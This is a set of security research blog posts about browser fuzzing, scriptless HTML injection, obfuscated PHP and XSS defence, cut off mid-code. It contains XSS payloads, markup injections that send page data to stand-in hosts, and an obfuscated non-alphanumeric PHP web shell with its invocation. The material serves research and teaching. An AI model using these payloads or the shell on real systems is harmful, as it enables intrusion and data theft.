Data enumeration tutorial in Shazzer

Friday, 10 February 2012

Over the last few days I’ve finally fixed a data enumeration bug that was haunting a new feature in Shazzer. Originally Shazzer just mutated one character at a time to discover characters which influenced the fuzz vectors in interesting ways. I decided to expand that to include data. I called the feature “datasets” because you can assign a placeholder to a set of data. Using this placeholder it becomes easy to generate a vector that checks each value in the dataset and, not only that, how that data relates to another dataset.

So what does that actually mean when it comes to vector creation? Here is an example enumeration vector:

<*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*>

*datahtmlelements* refers to a dataset, in this instance HTML elements, so the placeholder will be replaced by “br”, “b”, “html” and so on. The same thing happens to *datahtmlattributes*, but this time using each attribute. Shazzer checks your vector for how many placeholders it contains and then automatically loops over all the data, enumerating up to 5 separate datasets in nested loops. The work is split into chunks of at most 10,000 iterations, so all of your data will be enumerated no matter how large the total number of iterations is; it will just take a long time for a lot of nested datasets.

You can see in the vector that the placeholders are used more than once. This enables you to log any interesting results: here we use Shazzer’s customLog function to send the HTML element and attribute that executes. Other logging functions are available and are listed in the preparation code when you create a vector.
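To make the nested-loop idea concrete, here is a minimal sketch of expanding a vector over every combination of the datasets it references and splitting the result into batches. It is not Shazzer’s code: `expandVector`, the shape of the `datasets` object and the reading of “10,000 iterations” as a batch size are assumptions for illustration.

```javascript
// Hypothetical sketch, not Shazzer's implementation: expand a vector over
// every combination of the datasets it references (nested loops, flattened),
// then split the resulting vectors into batches of at most batchSize.
function expandVector(template, datasets, batchSize = 10000) {
  // Distinct placeholders such as *datahtmlelements*, in order of first use.
  const names = [...new Set(template.match(/\*data\w+\*/g) || [])];
  if (names.length > 5) {
    throw new Error('At most 5 datasets per vector');
  }
  // Build every combination: one level of nesting per dataset.
  let combos = [{}];
  for (const name of names) {
    const values = datasets[name.slice(1, -1)] || [];
    const next = [];
    for (const combo of combos) {
      for (const value of values) {
        next.push({ ...combo, [name]: value });
      }
    }
    combos = next;
  }
  // Substitute each combination into every occurrence of its placeholders.
  const vectors = combos.map(combo =>
    template.replace(/\*data\w+\*/g, placeholder => combo[placeholder]));
  const batches = [];
  for (let i = 0; i < vectors.length; i += batchSize) {
    batches.push(vectors.slice(i, i + batchSize));
  }
  return batches;
}

const batches = expandVector('<*dataelements* *dataattributes*>',
  { dataelements: ['b', 'i'], dataattributes: ['id', 'title'] }, 3);
// batches is [['<b id>', '<b title>', '<i id>'], ['<i title>']]
```

Because every occurrence of a placeholder gets the same value within one combination, the logging call can report exactly which element and attribute pair fired.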

Steps to create an enumeration vector

1. Check datasets for which data you would like to enumerate. You can create your own dataset if the one you require doesn’t exist.
2. Click create and select “Data enumeration” from the vector type drop down.
3. Give it a nice descriptive name and some keywords to find the vector.
4. You don’t actually need to modify the preparation code unless you need to log something that doesn’t execute, such as CSS values.
5. Construct your vector by clicking the data placeholders at the bottom, and craft your code as if you’re inside a loop over all the datasets you use.
6. Once your vector is complete you can fuzz it by choosing it from the “Fuzz vectors” list. Once you’ve found your vector, select a doctype and then click “Fuzz all” to begin fuzzing.

In future you will be able to share these enumeration vectors with your Twitter followers in order to distribute the workload between friends and help scan large datasets. Happy fuzzing!

Posted in fuzzing, javascript, php, Security, Shazzer, xss

Introducing Shazzer: A shared online fuzzer

Thursday, 12 January 2012

I lost inspiration for coding a while ago. I had an idea I’d been sitting on for a while, but I’m often stuck at the design stage before I write a line of code, and I refuse to continue without a clear picture in my head of how an app is going to work. After the Christmas break I got my inspiration back and pretty quickly worked out how Shazzer might work. Once I was happy with the design I started to code it, and it was like a jigsaw: everything just fitted nicely together.

So what the hell is it, I hear you ask? Shazzer allows you to perform client-based fuzzing and share the results with the world. It scans characters 0 to 100000 in a couple of seconds (depending on the vector) and allows you to build different vectors and preparation code. When you think about fuzzing, especially behaviour-based fuzzing, there are too many combinations for you to handle on your own. You need to scan every browser version, every OS, every charset, every doc mode (for IE) and so on; it’s an impossible amount of data to get through, especially when time is limited. At the moment it’s limited to single-character mutation and is designed for behaviour-based fuzzing rather than finding crashes (that will come later).

Shazzer is useful for asking simple questions, for example “What characters are allowed after an attribute name in IE9.0?”. The idea is to construct clever vectors that discover this information, scan with your own browser, and then ask your friends or colleagues to scan using theirs. The end goal is to use this information to file bugs, find holes in HTML filters or simply discover the differences between browser versions.

Constructing a vector

To make your own vectors, first search to see if the vector you are looking for already exists; there’s no point reinventing the wheel. Then hit create (after you’ve logged in). The description should be clear and concise and no more than 50 characters; bear in mind it will also form the URL of your vector, so keep it short and to the point. Keywords let you assign search terms to your vector; include any keywords you think are relevant, such as “anchor, XSS, href” if you are checking the anchor href for different characters. The preparation code allows you to modify how logging works. For JS execution vectors you shouldn’t need to modify it, but for HTML/CSS-based checks you should modify it to detect whether the vector was successful. Consider the following example:

<span id="fuzzelement*num*" style="*chr*color:#000;"></span>

Here the vector checks which characters are allowed before the property “color” in CSS, but as this vector doesn’t execute JavaScript you have to check each vector manually. You do this by modifying the preparation code just below the start of the complete function, like so:


for(var i=from;i<to;i++) {
  try {
    if(document.getElementById('fuzzelement'+i).style.color.length) {
      ids.push(i);
    }
  } catch(e) {}
}

This script takes advantage of the fuzzer’s predefined global variables: “from” is where Shazzer starts scanning, such as “0” or “10000”, and “to” is the end of the range it’s scanning. We then check whether the color property has been set on the target element and, if so, add the character number to ids. The try/catch block stops the fuzz script from breaking if the element doesn’t exist.

For the most part you shouldn’t have to modify the preparation code; you mainly work on adding new vectors. Vectors use placeholders: *chr* indicates the character and *num* is the character code. Taking the “characters after attribute” question from earlier as an example, you simply create some HTML that executes the log function and place *chr* where you want to check. For example:


"'><img src=x onerror*chr*=log(*num*)>

At the beginning of the example you will notice quotes and a closing “>”; these prevent the vectors from overlapping when an attribute is constructed from the fuzz data. The character we are fuzzing appears after onerror and is indicated by *chr*. When onerror executes, the log function (predefined in the preparation code) is called with the character code, indicated by *num*, as its argument. This vector will now work on any browser, charset or range that any user chooses, and lets you see the results.
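As a rough illustration of what happens to such a template, here is a sketch that produces one vector per character code in a range, using the same from (inclusive) and to (exclusive) convention as the preparation code. `buildCharVectors` is a hypothetical name; this is not how Shazzer itself is implemented.

```javascript
// Hypothetical sketch: one vector per code point in [from, to), with *chr*
// replaced by the character and *num* by its character code.
function buildCharVectors(template, from, to) {
  const vectors = [];
  for (let num = from; num < to; num++) {
    const chr = String.fromCodePoint(num);
    // A single pass with a replacer function, so a fuzzed "$" or "*" is
    // inserted literally and never re-read as a placeholder.
    vectors.push(template.replace(/\*(chr|num)\*/g,
      (match, name) => (name === 'chr' ? chr : String(num))));
  }
  return vectors;
}

const vectors = buildCharVectors('[*chr*]=*num*', 65, 68);
// vectors is ['[A]=65', '[B]=66', '[C]=67']
```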

Fuzzing Samples

Here are a few examples for you to play with:
Characters allowed before a JavaScript function
Characters that close a HTML comment

Have a go with Shazzer yourself and have fun!

Posted in fuzzing, javascript, php, Security, xss

Breaking feeds

Wednesday, 4 January 2012

This should break my feed, and the feed of anyone else who syndicates it without filtering:

0x05

That’s it LOL. Hope you enjoyed it, but I doubt you read it.



Posted in php, Security

HTML scriptless attacks

Wednesday, 21 December 2011

Following up on @lcamtuf’s post about a “post-XSS” world, I thought I’d chip in with some vectors he missed. The textarea consumption technique he mentioned isn’t new and wasn’t invented by “Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Colin Jackson”; it was openly discussed on sla.ckers for many years (as usual). Anyway, let’s discuss vectors.

Button as a scriptless vector

Using button is interesting because of two specification changes in HTML5: first, the default type of a button is submit, and second, the formaction attribute allows you to change its parent form’s action. In addition, button consumes HTML, allowing you to store any HTML after the button up to the next (or non-existent) closing button tag. Example vector:


<button name=xss type=submit formaction=//evil>I get consumed!

Option as a scriptless vector

A strange fact is that option also consumes HTML. It’s pretty obvious when you think about it, but it could lead to info disclosure like the button example.


<form action=//evil><select name=xss><option><b>steal me!</b>

@import as a scriptless vector

The CSS specification states that @import should continue parsing a URL until it encounters an ending “;”. This means you can use it to consume HTML. A vector like the following can steal data:


<style>@import//hackvertor.co.uk?
<b>steal me!</b>;

Noscript scriptless vector

Another interesting way to defeat XSS filters is to use the noscript tag as demonstrated by my attack against Caja’s HTML filter.


<noscript><form action=google.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=pwnd><textarea name=contents></noscript>

It uses the noscript tag to generate a textarea that, when enabled (because JavaScript isn’t available), consumes the HTML after it. This can also be triggered using security=restricted on IE or the new HTML5 iframe sandbox option. Original report.

Using window.name via base target

You can also use the target attribute to assign the HTML that follows to the window name, and later retrieve it cross-domain after the user clicks an external link.


<base target='
steal me'<b>test</b>

So here we inject a base tag with a target attribute. The target assigns everything after the ‘ to window.name, which can then be retrieved when the user clicks through to the external server.

That’s all folks.

Posted in Security, xss

NULLs in entities in Firefox

Monday, 5 December 2011

HTML5 introduced a load of new entities. I dunno why; maybe they thought the original ones weren’t hard enough to protect against already. Anyway, Firefox has a bug (or “feature”) that allows NULLs inside entities. I tweeted it, but if I don’t post it here it will probably be lost in a sea of tweets. You can place NULLs after the “&” or before the “;”, which allows you to construct a pretty weird entity (0x00 below stands for a literal NULL byte):


javascript&0x00colon;
javascript&colon0x00;

These obviously work inside an anchor href, and I think Firefox additionally requires the HTML5 doctype.

Posted in javascript, Security

staticHTML property

Tuesday, 29 November 2011

The staticHTML property allows you to get/set filtered HTML directly on the DOM object you’re using. Browser vendors don’t support this property yet: IE has a toStaticHTML function, and Firefox, via the NoScript plugin, emulates toStaticHTML but doesn’t let you set/get directly. So I decided to create a JavaScript version that can provide it until the vendors implement it. As I was updating HTMLReg and CSSReg with some new features, I thought this might be a good time to add support for it. The problem with static HTML is that you have no way to stop one element from overlapping another. The traditional way HTMLReg protects against this is to use a container element that is restricted via CSS to certain dimensions, with its overflow hidden, so you can’t break out of that element via absolute positioning etc.

It’s not possible to have a container for every element, and I couldn’t figure out another way to stop the overlapping problem, so whenever an element is modified you cannot alter its dimensions or position. If you want a section of your HTML where user input is allowed to alter dimensions, you can place a container div like so:


<div id="staticHTML" style="border:1px solid #ccc;position:relative;px;px;overflow:hidden;"></div>

This way the modified HTML can’t break out of this element, so any modification of staticHTML inside it should be safe. You’d need to modify the HTMLReg code when you include it on your site in order to allow dimensions and positioning, like so:


if(Element.prototype && !Element.prototype.staticHTML) {
  window.Object.defineProperty(Element.prototype, 'staticHTML', {
    get: function() {
      HTMLReg.setAppID('staticHTML');
      HTMLReg.disablePositioning = false;//changed this line!
      return HTMLReg.parse(this.innerHTML+'');
    },
    set: function(val) {
      HTMLReg.setAppID('staticHTML');
      HTMLReg.disablePositioning = false;//changed this line!
      this.innerHTML = HTMLReg.parse(val+'');
    }
  });
}

To use the property itself you just read and write to the staticHTML property of the DOM object. You can read the staticHTML property without actually altering the DOM object’s innerHTML. Examples below:

document.getElementById('x').staticHTML='<b>test</b>';
alert(document.getElementById('x').staticHTML)

Finally there is the demo and the usual question. Can you break it?
Static HTML demo

Update….

Oh yeah, I got it working in IE7 via HTC :O How awesome is that?

Posted in CSSReg, DOM, HTMLReg, javascript, Security, xss

Non-alpha JavaScript and PHP slides

Thursday, 17 November 2011

I had fun at OWASP Manchester, and my talk went really well. I think I’m getting more confident with talks now. I have a tendency to rush through and get slightly ahead of myself sometimes, but overall I did much better and had some great feedback along with some very interesting questions. Enjoy the slides!

Here are my non-alphanumeric JavaScript & PHP slides (powerpoint) (pdf)

Posted in javascript, php, Security

We need @ urls

Monday, 17 October 2011

Just thought I’d state the obvious: we need @ URLs. At the moment, when using @ the browser assumes you want to use FTP on the site in question, but I propose that a URL beginning with @ should default to your chosen social network. @uid would resolve to twitter.com/uid or facebook.com/uid. Doesn’t that make sense? Look at TV adverts that say “follow us on Twitter”, for example: @ourid doesn’t really make sense to the average user, does it? But if you could type it directly into the browser and it prompted you to follow the user, suddenly it’s much more friendly and usable.

How it could work

The @ url would default to your chosen social network but display icons next to the typed in uid which would allow you to choose facebook, twitter or a different social network. If you hit return it would use your default.


The social network could configure the appearance of the icon as well as the user id url to be sent to. Something like:


<meta name="social network" content="text='Add twitter to your social networks?',icon='https://twitter.com/images/someicon.png',url='https://twitter.com/%s'" />
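Purely to illustrate the proposal (no browser implements anything like this), here is a sketch of how a browser might read that meta content and resolve an @uid. The `parseSocialMeta` and `resolveAtUrl` names and the parsing rules are assumptions of mine, not part of any specification.

```javascript
// Hypothetical: read the key='value' pairs from the proposed meta content.
function parseSocialMeta(content) {
  const config = {};
  const pairRe = /(\w+)='([^']*)'/g;
  let m;
  while ((m = pairRe.exec(content)) !== null) {
    config[m[1]] = m[2];
  }
  return config;
}

// Hypothetical: turn "@uid" into a profile URL via the network's %s template.
function resolveAtUrl(input, config) {
  const match = /^@(\w+)$/.exec(input.trim());
  if (!match || typeof config.url !== 'string') return null; // not an @ URL
  return config.url.replace('%s', encodeURIComponent(match[1]));
}

const twitter = parseSocialMeta(
  "text='Add twitter to your social networks?'," +
  "icon='https://twitter.com/images/someicon.png'," +
  "url='https://twitter.com/%s'");
resolveAtUrl('@ourid', twitter); // 'https://twitter.com/ourid'
```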

Posted in ideas

Non alphanumeric code in PHP

Thursday, 22 September 2011

So a small PHP shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. I started with the idea of using octal escapes in PHP and constructing the escape: for example, \107 is “G”, so if I could construct “107” and add a backslash to the beginning, maybe I could construct “G”. It worked like this:


$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";

But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.
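JavaScript can act as a calculator to check the arithmetic in that snippet, assuming the pre-increments are evaluated left to right, as the //107 comment implies. This only verifies the numbers; the technique itself is PHP.

```javascript
// JavaScript used only as a calculator to check the PHP arithmetic above.
let a = 0;
a = (++a) + (++a) + (++a) + (++a);   // 1 + 2 + 3 + 4 = 10
const b = 1;                          // $__ after $__++
const code = a * a + 7 * b;           // 107 (the PHP adds $__ seven times)
const chr = String.fromCharCode(parseInt(String(code), 8)); // octal 107 = 71
console.log(code, chr);               // prints: 107 G
```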
Then I had a brainwave: PHP automatically converts arrays to the string “Array” when they are accessed as a string. That gave me “A”, “r”, “r” etc., but I really needed “GET” in order to create a nice small non-alpha shell.

On to the second technique: PHP allows you to use bitwise operators on strings.

'a'|'b';//c!

We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later, I had combined the characters to create “GET”, and thus our small non-alphanumeric PHP shell:


<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"0x06").($_[+""]|"0x05").($_[+""]^"0x15");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

The first part converts the string into an array by attempting to assign to position “0” of the string. Then I make sure the array is converted back to a string (“Array”). Then I use the “A” from “Array” with bitwise operators to construct “G”, “E” and “T”: “A”|0x06, “A”|0x05 and “A”^0x15 (in the code, "0x06", "0x05" and "0x15" stand for the raw bytes with those values). There you have it. You could even generate non-alpha code without using GET quite easily, by producing different characters until you get an eval method.
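PHP applies | and ^ to strings byte by byte. JavaScript’s operators only work on numbers, so this sketch (with a hypothetical helper, `bitwiseChars`) applies them to the character codes explicitly to confirm the values used above.

```javascript
// Apply a bitwise operator to two single characters, PHP-style, by
// operating on their character codes.
function bitwiseChars(a, b, op) {
  const x = a.charCodeAt(0);
  const y = b.charCodeAt(0);
  const result = op === '|' ? x | y : op === '^' ? x ^ y : x & y;
  return String.fromCharCode(result);
}

console.log(bitwiseChars('a', 'b', '|'));  // c   (0x61 | 0x62 = 0x63)
console.log(
  bitwiseChars('A', '\x06', '|') +         // G   (0x41 | 0x06 = 0x47)
  bitwiseChars('A', '\x05', '|') +         // E   (0x41 | 0x05 = 0x45)
  bitwiseChars('A', '\x15', '^')           // T   (0x41 ^ 0x15 = 0x54)
);                                         // prints: GET
```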

To call the shell you’d use:
?_=shell_exec&__=whoami

Don’t forget: if you ever encounter this in the wild, use RIPS to analyze the PHP code.

Posted in php, Security

Protecting against XSS

Monday, 12 September 2011

The problem as I see it

Where to start? Let me start by telling you that most of the books you read are wrong. The code samples you copy off the internet to do a specific task are wrong (the wrong way to handle a GET request), and the function you copied from that work colleague, who in turn copied it from a forum, is wrong (the wrong way to handle redirects). Start to question everything. Maybe this blog post is wrong. This is the kind of mindset you need in order to protect your sites from XSS. You as a developer need to start thinking more about your code. If an article you are reading contains stuff like echo $_GET or Response.Write without filtering, it’s time to close that article.

Are frameworks the answer? In my honest opinion, no. Yes, a framework might prevent XSS in the short term, but in the long term the framework code will be shown to contain mistakes as it evolves, and when it is exploited the impact will be more severe than if you had written the code yourself. Why more severe? A framework hole can easily be exploited automatically, since many sites share the same codebase. If you wrote your own filtering code, an attacker might be able to exploit that individual site but would find it hard to automate attacks against a range of sites using different filtering methods. This is one of the main reasons the internet works today: not because everything is secure, just because everything is different.

One of the arguments I hear is that a developer can’t be trusted to create a perfect filtering system for a site, and that using a framework ensures the developer follows best-practice guidelines. I disagree. Developers are intelligent; they write code and understand code. If you can build a system you can protect it, because you’re in the best position to.

How to handle input

When you handle user input, just think to yourself “a number is a vector”. Imagine a site that renders an image server side and allows you to choose the width and height of the graphic. If you don’t think a number is a vector, you might not put any restrictions on the width and height of the generated graphic, but what happens when an attacker requests a 100000×100000 graphic? If your code doesn’t enforce maximum and minimum values, an attacker can DoS your server with multiple requests. The lesson is not to be lazy about any input you handle; you need to make sure each value is validated correctly.
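Here is a minimal sketch of treating the width or height of that image as a vector, assuming the raw value arrives as a query-string parameter. `parseDimension` and the 1 to 2000 pixel limits are hypothetical values chosen for illustration; pick limits that suit your renderer.

```javascript
// Hypothetical limits for a server-side image renderer.
const MIN_DIMENSION = 1;
const MAX_DIMENSION = 2000;

// Returns a safe integer dimension, or null if the input is unacceptable.
function parseDimension(raw) {
  if (typeof raw !== 'string') return null;      // reject arrays/objects
  if (!/^[0-9]{1,4}$/.test(raw)) return null;    // digits only, short length
  const value = Number(raw);
  if (value < MIN_DIMENSION || value > MAX_DIMENSION) return null; // range
  return value;
}

parseDimension('100');     // 100
parseDimension('100000');  // null: too long, so never reaches the renderer
```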

The process should be as follows.
1. Validate type – Ensure the value you are getting is what you were expecting.
2. Whitelist – Remove any characters that should not be in the value by specifying the only characters that should.
3. Validate Length – Always validate the length of the input, even when the value isn’t being placed in the database. The less an attacker has to work with, the better.
4. Restrict – Refine what’s allowed within the range of characters you allow. For example, is the minimum value 5?
5. Escape – Depending on context (where your variable is on the page) escape correctly.

You can make things easier for yourself by placing these methods into a function or a class, but don’t overcomplicate things: keep each method as simple as possible, and be very careful and descriptive with your function names to avoid confusion.

HTML context

Let’s look at an example of the method above with a code sample in PHP.

<?php
$x = (string) $_GET['x']; //ensure we get a string not array
$x = preg_replace("/[^\w]/","", $x); //remove any characters that are not a-z, A-Z, 0-9 or _
$x = substr($x, 0, 10);//restrict to a maximum of 10 characters
if(!preg_match("/^a/i", $x)) {//this value must only begin with a or A
	$x = '';
}
echo '<b>' . htmlentities($x, ENT_QUOTES) . '</b>'; //escape everything according to context of $x
?>

You might be wondering why I used (string) in the code above. Let’s try it without it.

Using the following: test.php?x[]=123
Results in: “Warning: substr() expects parameter 1 to be string, array given”

Because PHP lets you pass arrays in a GET request, an unexpected type can trigger a warning when you try to whitelist the value. Casting with (string) ensures you get the expected type.
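For comparison, here is the same five-step process sketched in JavaScript. `filterX` is a hypothetical name; the `typeof` check plays the role of the (string) cast by rejecting anything that isn’t a string (such as an array), and `escapeHtml` is a hand-written stand-in for `htmlentities($x, ENT_QUOTES)` that only handles the five HTML-significant characters.

```javascript
// Escape the characters that are significant in HTML text and quoted attributes.
function escapeHtml(str) {
  return str.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

function filterX(raw) {
  let x = typeof raw === 'string' ? raw : '';  // 1. validate type
  x = x.replace(/[^\w]/g, '');                 // 2. whitelist a-z, A-Z, 0-9, _
  x = x.slice(0, 10);                          // 3. maximum of 10 characters
  if (!/^a/i.test(x)) x = '';                  // 4. must begin with a or A
  return '<b>' + escapeHtml(x) + '</b>';       // 5. escape for HTML context
}

filterX('abc<script>');  // '<b>abcscript</b>'
filterX(['a']);          // '<b></b>'
```

As in the PHP version, the escape step is redundant after such a strict whitelist, but keeping it means a later loosening of the whitelist doesn’t silently open a hole.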

Great, so we now understand how to restrict and escape a value. Let’s look at another context.

Script context

When not in XHTML/XML mode, a script tag does not decode HTML entities. If you have a value within a variable inside a script tag, the question is: what do you escape?

example:

<script>x='value here';</script>

Inside a JavaScript variable like this you have to watch out for ‘ and </script>; using these it’s possible to XSS the value. The two vectors are listed below.

vector 1: ',alert(1),//
vector 2: </script><img src=x onerror=alert(1)>

The second example requires no quotes, and a lot of developers assume it won’t execute because it’s still inside a JavaScript variable. This is clearly wrong: the HTML parser ends the script block at the first </script> it sees, before the JavaScript engine ever parses the string, so the browser doesn’t know where the script really begins and ends.

To escape a value inside a script context you should JavaScript escape the value. The best way of doing this is using unicode escapes, a unicode escape in JavaScript looks like the following:


<script>
alert('\u0061');//"a" in a unicode escape
</script>

You can experiment with unicode escapes using my Hackvertor tool. Please understand how they work as they will be very important to you when understanding how to protect many contexts.

It’s very important you follow the same procedure as before (Validate type, Whitelist, Validate Length, Restrict, Escape) for the specific variable you’re working on but this time we will convert our value into unicode escapes. A simple function to do that is as follows:

<?php
function jsEscape($input) {
	if(strlen($input) == 0) {
		return '';
	}
	$output = '';
	$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);//remove any characters outside the range 0x01-0x7f
	$chars = str_split($input);
	for($i=0;$i<count($chars);$i++) {
		$char = $chars[$i];
		$output .= sprintf("\\u%04x", ord($char));//get the character code, convert it to hex and prefix with \u (zero-padded to 4 digits)
	}
	return $output;
}
?>

I’ve purposely designed this function with a few little optimisations missing. For example, instead of unicode escapes you could use hex escapes, since we restrict the range of allowed characters; alphanumeric characters are converted even though they could be left as literal characters; and new lines/tabs are encoded too when you could use the shorter equivalents. Let’s add a line to use the shorter \t escape instead of \u0009. Why would you want to do this? To reduce the number of characters sent down the wire.

Code to handle tab:

<?php
if(preg_match("/^\t$/", $char)) {
   $output .= '\\t';
   continue;
}
?>

This converts a tab specifically to “\t”. Notice how we keep input and output separate, and by using continue we skip the generic escaping for that input character and override it with something more specific. The full code is below for clarity.

<?php
function jsEscape($input) {
	if(strlen($input) == 0) {
		return '';
	}
	$output = '';
	$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);
	$chars = str_split($input);
	for($i=0;$i<count($chars);$i++) {
		$char = $chars[$i];
		if(preg_match("/^\t$/", $char)) {
			$output .= '\\t';//don't unicode escape, use the shorter \t instead. Double escape remember!
			continue;//move on to the next char
		}
		$output .= sprintf("\\u%04x", ord($char));
	}
	return $output;
}
?>

Exercises for this code:
1. Can you handle characters outside the ASCII range?
2. Convert any non-dangerous characters to their shorter escaped or literal representation.
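One possible answer to both exercises, sketched in JavaScript (the name `jsEscapeCompact` is hypothetical): keep alphanumerics literal, use \t, \n and \r for common whitespace, and \uXXXX for everything else, including characters outside ASCII. JavaScript strings are UTF-16, so a character above U+FFFF comes out as two \uXXXX surrogate escapes, which JavaScript reassembles when it parses the literal.

```javascript
function jsEscapeCompact(input) {
  input = String(input);
  const shortEscapes = { '\t': '\\t', '\n': '\\n', '\r': '\\r' };
  let output = '';
  // Walk UTF-16 code units: astral characters become surrogate-pair escapes.
  for (let i = 0; i < input.length; i++) {
    const ch = input[i];
    if (/^[A-Za-z0-9]$/.test(ch)) {
      output += ch;                  // safe in the contexts discussed here
    } else if (Object.prototype.hasOwnProperty.call(shortEscapes, ch)) {
      output += shortEscapes[ch];    // shorter than \u0009, \u000a, \u000d
    } else {
      output += '\\u' + input.charCodeAt(i).toString(16).padStart(4, '0');
    }
  }
  return output;
}

jsEscapeCompact('</script>');  // '\u003c\u002fscript\u003e' (as literal text)
```

The literal “&” never survives, so the output is also safe in the XHTML and attribute contexts discussed below.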

Script context in XHTML

In the previous section you might have wondered about XHTML when I stated “when not in XHTML/XML mode a script tag does not decode HTML entities”. In XHTML, entities are decoded even inside script blocks! Fortunately the code I provided in that section handles this, since unicode escapes are used. If you followed the exercises, did you make the “&” safe? That is something to think about when you are working on an XHTML page. For the browser to parse a page as XHTML you have to serve it with the XHTML content type (application/xhtml+xml). I recommend you don’t use the XHTML header.

Even though the previous examples still protect you against attack, I will show you a couple of vectors for XHTML sites:


<script>x='&#39;,alert(/This works in XHTML/)//';</script>


<script>x='&apos;,alert(/This also works in XHTML/)//';</script>

This would work in any XML-based format: entities can be used to break out of strings, and a simple &lt/ will also do the trick. Don’t use XHTML, or if you do, unicode escape and don’t allow a literal “&”.

JavaScript events

Now that you know what happens in XHTML, you might be interested to know it also happens in HTML attributes. Any HTML attribute, including events such as onclick, automatically decodes entities and uses them as if they were literal characters. This is best demonstrated with a code example.


<div title="&gt;" id="x">test</div>
<script>
alert(document.getElementById('x').title);
</script>

As you can see, instead of returning “&gt;”, the title attribute of the div element returned “>” because it was automatically decoded. Developers not understanding this automatic decoding is one of the root causes of XSS. Let’s look at what happens with an onclick event and a variable “x”.


<a href="#" onclick="x='&#39;,alert(1)//';">test</a>

Clicking the link fires the alert because, as in XHTML, the entities are decoded. In the attribute context you need to do exactly the same as in the XHTML context. Reusing your jsEscape function will fully protect you from XSS in attributes and variables like this.
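To see why jsEscape output is safe in an attribute, here is a deliberately minimal entity decoder applied to the attack string and to an escaped value. `decodeEntities` is a hypothetical helper that handles only numeric entities and five named ones, far fewer than a browser does; it is enough to show the mechanism.

```javascript
// Minimal, incomplete decoder: numeric entities plus a few named ones.
function decodeEntities(str) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return str.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);/g, (match, body) => {
    if (body[0] === '#') {
      const isHex = body[1] === 'x' || body[1] === 'X';
      const code = parseInt(body.slice(isHex ? 2 : 1), isHex ? 16 : 10);
      return code > 0x10FFFF ? match : String.fromCodePoint(code);
    }
    // Unknown names are left untouched.
    return Object.prototype.hasOwnProperty.call(named, body) ? named[body] : match;
  });
}

// The encoded quote becomes a real quote, so the string closes early:
decodeEntities("x='&#39;,alert(1)//';");        // "x='',alert(1)//';"
// jsEscape output contains no "&" at all, so decoding changes nothing:
decodeEntities("x='\\u0026\\u0023\\u0033\\u0039\\u003b';");
```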

innerHTML context

I hope you’ve grasped the previous concepts, because now it’s going to get slightly confusing. If you’re in the script context and you are assigning a value that writes to the DOM in some way, the previous escaping rules break down. Although you are escaping the value correctly for the script context, the context shifts once the value is applied to innerHTML. As always, here is an example:


<div id="x"></div>
<script>
//this is bad don't do this with innerHTML
document.getElementById('x').innerHTML='<?php echo jsEscape($_GET['x']);?>';</script>

Even though the string is “\u003c\u0069\u006d\u0067\u0020\u0073\u0072…” and so on, it will still cause XSS, because the innerHTML write sees the decoded characters from the JavaScript string. You need to escape for the HTML context as well as the script context; add XHTML to that and it gets really, really complicated. My advice is not to allow HTML when using the innerHTML context: whitelist and restrict your values and use innerText or textContent instead. If you really need HTML inside innerHTML, follow the tutorial at the end on how to write a basic HTML filter for innerHTML.
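The layering problem can be shown without a browser. In this sketch (hypothetical helper names), `JSON.parse` stands in for the JavaScript engine decoding a string literal, since it understands the same \uXXXX escapes; whatever comes out of that step is what innerHTML would parse.

```javascript
function escapeHtml(str) {
  return str.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// Simplified jsEscape: every UTF-16 code unit becomes \uXXXX.
function jsEscape(str) {
  let out = '';
  for (let i = 0; i < str.length; i++) {
    out += '\\u' + str.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out;
}

// What the JavaScript engine hands to innerHTML after decoding the literal.
function decodeJsLiteral(escaped) {
  return JSON.parse('"' + escaped + '"');
}

decodeJsLiteral(jsEscape('<img src=x>'));              // '<img src=x>': markup again
decodeJsLiteral(jsEscape(escapeHtml('<img src=x>')));  // '&lt;img src=x&gt;': text
```

The HTML escape must be applied first (innermost) because the JavaScript layer is removed before innerHTML ever sees the value.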

CSS context

The same rules I’ve stated previously apply to CSS: a style block will not decode entities except in XHTML/XML mode, and style attributes decode HTML entities automatically. This makes protecting against injections in the CSS context hard if you don’t know what you’re doing. In addition to the regular entities, CSS also supports its own format of hex escapes: a backslash followed by the hex code of the required character, optionally zero-padded, up to 6 hex digits long (vendors also supported a large amount of zero padding beyond the 6-digit restriction). To see how it looks, let’s use Hackvertor again to build our string.

As you can see there are quite a few combinations you can use, and there are more. The CSS specification states that comments can be used, in C style /* */, and any hex escape can be followed by a space to stop the next character from continuing the hex escape. E.g. to CSS, \61 \62 \63 is still “abc” regardless of the spaces. Hopefully you’ve read my blog for a while and know about combining entities with hex escapes, or maybe you’ve just realised? Yes, that’s right: you can use hex escapes, comments and HTML entities to construct a valid, executable CSS value.
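To see how a CSS parser reads those escapes, here is a simplified decoder based on the escape rules in the CSS Syntax specification: a backslash followed by one to six hex digits, with one optional trailing whitespace character swallowed, or a backslash followed by any other character, which then stands for itself. `decodeCssEscapes` is a hypothetical helper; it ignores comments, HTML entities and the longer vendor zero padding, so it shows only one layer of the problem.

```javascript
function decodeCssEscapes(css) {
  return css.replace(
    /\\(?:([0-9a-fA-F]{1,6})(?:\r\n|[ \t\n\r\f])?|([^\n\r\f0-9a-fA-F]))/g,
    (match, hex, literal) => {
      if (hex !== undefined) {
        const code = parseInt(hex, 16);
        // Zero, surrogates and out-of-range values become U+FFFD per the spec.
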